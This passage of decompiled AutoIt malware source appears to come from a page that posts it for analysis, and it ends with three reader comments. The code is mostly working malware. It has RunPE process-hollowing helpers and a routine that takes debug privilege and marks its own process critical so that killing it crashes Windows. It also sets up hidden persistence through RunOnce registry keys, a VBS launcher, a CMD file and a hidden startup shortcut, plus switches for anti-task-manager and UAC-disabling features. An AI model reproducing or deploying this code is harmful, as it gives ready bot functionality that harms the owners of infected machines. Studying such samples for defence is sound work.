Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Return $acall[0]
EndFunc
Func __runpe_unmapviewofsection($hprocess, $paddress)
DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress)
If @error Then Return SetError(1, 0, 0)
Return 1
EndFunc
Func __runpe_iswow64process($hprocess)
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Return $acall[2]
EndFunc
Global Const $error_no_token = 1008
Global Const $se_privilege_enabled_by_default = 1
Global Const $se_privilege_enabled = 2
Global Const $se_privilege_removed = 4
Global Enum $tokenprimary = 1, $tokenimpersonation
Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation
Global Const $token_assign_primary = 1
Global Const $token_duplicate = 2
Global Const $token_impersonate = 4
Global Const $token_query = 8
Global Const $token_query_source = 16
Global Const $token_adjust_privileges = 32
Func _winapi_getlasterror($curerr = @error, $curext = @extended)
Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
Return SetError($curerr, $curext, $aresult[0])
EndFunc
Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0)
Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__getlengthsid($psid)
If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid)
If @error Then Return SetError(2, @extended, 0)
Return $acall[0]
EndFunc
Func _security__impersonateself($ilevel = $securityimpersonation)
Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__isvalidsid($psid)
Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__lookupaccountname($saccount, $ssystem = "")
Local $tdata = DllStructCreate("byte SID[256]")
Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Local $aacct[3]
$aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID"))
$aacct[1] = $acall[5]
$aacct[2] = $acall[7]
Return $aacct
EndFunc
Func _security__lookupprivilegevalue($ssystem, $sname)
Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Return $acall[3]
EndFunc
Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False)
If $hthread = 0 Then $hthread = _winapi_getcurrentthread()
If @error Then Return SetError(1, @extended, 0)
Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0)
If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
Return $acall[4]
EndFunc
Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False)
Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
If $htoken = 0 Then
If _winapi_getlasterror() <> $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0)
If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0)
$htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0)
EndIf
Return $htoken
EndFunc
Func _security__setprivilege($htoken, $sprivilege, $fenable)
Local $iluid = _security__lookupprivilegevalue("", $sprivilege)
If $iluid = 0 Then Return SetError(1, @extended, False)
Local $tcurrstate = DllStructCreate($tagtoken_privileges)
Local $icurrstate = DllStructGetSize($tcurrstate)
Local $tprevstate = DllStructCreate($tagtoken_privileges)
Local $iprevstate = DllStructGetSize($tprevstate)
Local $trequired = DllStructCreate("int Data")
DllStructSetData($tcurrstate, "Count", 1)
DllStructSetData($tcurrstate, "LUID", $iluid)
If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False)
DllStructSetData($tprevstate, "Count", 1)
DllStructSetData($tprevstate, "LUID", $iluid)
Local $iattributes = DllStructGetData($tprevstate, "Attributes")
If $fenable Then
$iattributes = BitOR($iattributes, $se_privilege_enabled)
Else
$iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled))
EndIf
DllStructSetData($tprevstate, "Attributes", $iattributes)
If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False)
Return True
EndFunc
Func _security__sidtostringsid($psid)
If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "")
Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0)
If @error OR NOT $acall[0] Then Return SetError(2, @extended, "")
Local $pstringsid = $acall[2]
Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text")
_winapi_localfree($pstringsid)
Return $ssid
EndFunc
Func _security__stringsidtosid($ssid)
Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Local $psid = $acall[2]
Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid)
Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]")
DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data"))
_winapi_localfree($psid)
Return $tsid
EndFunc
Func _winapi_closehandle($hobject)
Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_createsolidbrush($ncolor)
Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_deletedc($hdc)
Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_deleteobject($hobject)
Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_fillrect($hdc, $ptrrect, $hbrush)
Local $aresult
If IsPtr($hbrush) Then
$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush)
Else
$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush)
EndIf
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_getclassname($hwnd)
If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
If @error Then Return SetError(@error, @extended, False)
Return SetExtended($aresult[0], $aresult[2])
EndFunc
Func _winapi_getclientrect($hwnd)
Local $trect = DllStructCreate($tagrect)
DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect)
If @error Then Return SetError(@error, @extended, 0)
Return $trect
EndFunc
Func _winapi_getcurrentthread()
Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getdc($hwnd)
Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getdesktopwindow()
Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow")
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getmodulehandle($smodulename)
Local $smodulenametype = "wstr"
If $smodulename = "" Then
$smodulename = 0
$smodulenametype = "ptr"
EndIf
Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getwindow($hwnd, $icmd)
Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_iswindowvisible($hwnd)
Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_lineto($hdc, $ix, $iy)
Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_localfree($hmem)
Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_moveto($hdc, $ix, $iy)
Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $fdebugpriv = False)
Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
If @error Then Return SetError(@error, @extended, 0)
If $aresult[0] Then Return $aresult[0]
If NOT $fdebugpriv Then Return 0
Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
If @error Then Return SetError(@error, @extended, 0)
_security__setprivilege($htoken, "SeDebugPrivilege", True)
Local $ierror = @error
Local $ilasterror = @extended
Local $iret = 0
If NOT @error Then
$aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
$ierror = @error
$ilasterror = @extended
If $aresult[0] Then $iret = $aresult[0]
_security__setprivilege($htoken, "SeDebugPrivilege", False)
If @error Then
$ierror = @error
$ilasterror = @extended
EndIf
EndIf
_winapi_closehandle($htoken)
Return SetError($ierror, $ilasterror, $iret)
EndFunc
Func __winapi_parsefiledialogpath($spath)
Local $afiles[3]
$afiles[0] = 2
Local $stemp = StringMid($spath, 1, StringInStr($spath, "", 0, -1) - 1)
$afiles[1] = $stemp
$afiles[2] = StringMid($spath, StringInStr($spath, "", 0, -1) + 1)
Return $afiles
EndFunc
Func _winapi_releasedc($hwnd, $hdc)
Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_screentoclient($hwnd, ByRef $tpoint)
Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_selectobject($hdc, $hgdiobj)
Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_stringlenw($vstring)
Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring)
If @error Then Return SetError(1, @extended, 0)
Return $acall[0]
EndFunc
$scriptname = "adSR.NDlzD"
Func anti_hook()
__bsod($scriptname, True)
EndFunc
$protectprocess = IniRead($uniscriptdir & "PInjcjRe.CGN", "protectprocess1", "protectprocess2", "NotFound")
If $protectprocess = "protectprocess3" Then
AdlibRegister("anti_hook", 500)
Else
EndIf
Func __bsod($process_name, $bsod_status)
Local Const $status_success = 0
Local Const $bsod_class = 29
Local Const $info_length = 4
Local Const $process_all_access = 2035711
Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr
If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $process_name & " ] CAN NOT CHANGED"
$process_id = ProcessExists($process_name)
If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $process_name & " ] NOT EXIST"
$process_handle = _winapi_openprocess($process_all_access, True, $process_id)
If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $process_name & " ] PROCESS"
$bsod_struct = DllStructCreate("BOOL BSOD_STATUS")
DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status)
$bsod_struct_ptr = DllStructGetPtr($bsod_struct)
$result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length)
_winapi_closehandle($process_handle)
$bsod_struct_ptr = 0
If $result[0] = $status_success Then
Return "+[>] BSOD OF PROCESS [ " & $process_name & " ] CHANGED WITH NO ERROR" & @CRLF
Else
Return "![>] ERROR : BSOD OF PROCESS [ " & $process_name & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8)
EndIf
EndFunc
Func __debuge_privilege($status)
Local $htoken, $ilasterror
$htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
If @error Then Return SetError(@error, @extended, 0)
$ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status)
_winapi_closehandle($htoken)
Return $ilasterror
EndFunc
OnAutoItExitRegister("exitme")
Func exitme()
__bsod($scriptname, False)
EndFunc
Local $antibotkill = IniRead($uniscriptdir & "PInjcjRe.CGN", "antibotkill-1", "antibotkill-2", "NotFound")
If $antibotkill = "antibotkill-3" Then
AdlibRegister("antibotkill", 1000)
Else
EndIf
Func antibotkill()
$getstart = RegRead("HKCU64SoftwareMicrosoftWindowsCurrentVersionRunOnce", $path)
If $getstart = $unicode_temp & "" & $path & "53965.vbs" Then
Else
RegWrite("HKCU64SoftwareMicrosoftWindowsCurrentVersionRunOnce", $path, "REG_SZ", $unicode_temp & "" & $path & "53965.vbs")
EndIf
If NOT FileExists($unicode_temp & "" & $path & "53965.vbs") Then
Local $vbs = FileOpen($unicode_temp & "" & $path & "53965.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_temp & "" & $path & "" & '88684.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
EndIf
If NOT FileExists($unicode_temp & "" & $path & "88684.cmd") Then
$autoit3 = "adSR.NDlzD"
Local $bat = FileOpen($unicode_temp & "" & $path & "88684.cmd", 1)
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"')
FileClose($bat)
EndIf
If NOT FileExists($unicode_startup & "start.lnk") Then
FileCreateShortcut($unicode_temp & "" & $path & "53965.vbs", $unicode_startup & "start.lnk")
FileSetAttrib($unicode_startup & "start.lnk", "+SH")
EndIf
EndFunc
Local $persistence = IniRead($uniscriptdir & "PInjcjRe.CGN", "persistence1", "persistence2", "NotFound")
If $persistence = "persistence3" Then
AdlibRegister("persistence", 500)
Else
EndIf
Local $systemhide = IniRead($uniscriptdir & "PInjcjRe.CGN", "systemhide1", "systemhide2", "NotFound")
If $systemhide = "systemhide3" Then
AdlibRegister("systemhide", 500)
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "PInjcjRe.CGN", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
AdlibRegister("antitask", 500)
Else
EndIf
Local $uac = IniRead($uniscriptdir & "PInjcjRe.CGN", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
AdlibRegister("disable_uac", 500)
Else
EndIf
If $uac = "uac3" Then
loop()
EndIf
If $systemhide = "systemhide3" Then
loop()
EndIf
If $antitask = "antitask" Then
loop()
EndIf
If $antibotkill = "antibotkill-3" Then
loop()
EndIf
If $mutex = "mutex3" Then
loop()
EndIf
If $protectprocess = "protectprocess3" Then
loop()
EndIf
If $persistence = "persistence3" Then
loop()
EndIf
Func loop()
While 1
If FileExists($unicode_temp & "datascramblerclean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc
Anonymous - December 30, 2013 at 7:39 pm
another HF kiddy with a botnet.
Anonymous - January 30, 2014 at 11:52 am
Can you say how you decrypted to get the AutoIt script? I am pretty sure I have the same thing happening…
Anonymous - February 17, 2014 at 4:46 pm
it's not encrypted. you need to find it and remove the commented lines with notepad++ or similar to reveal the script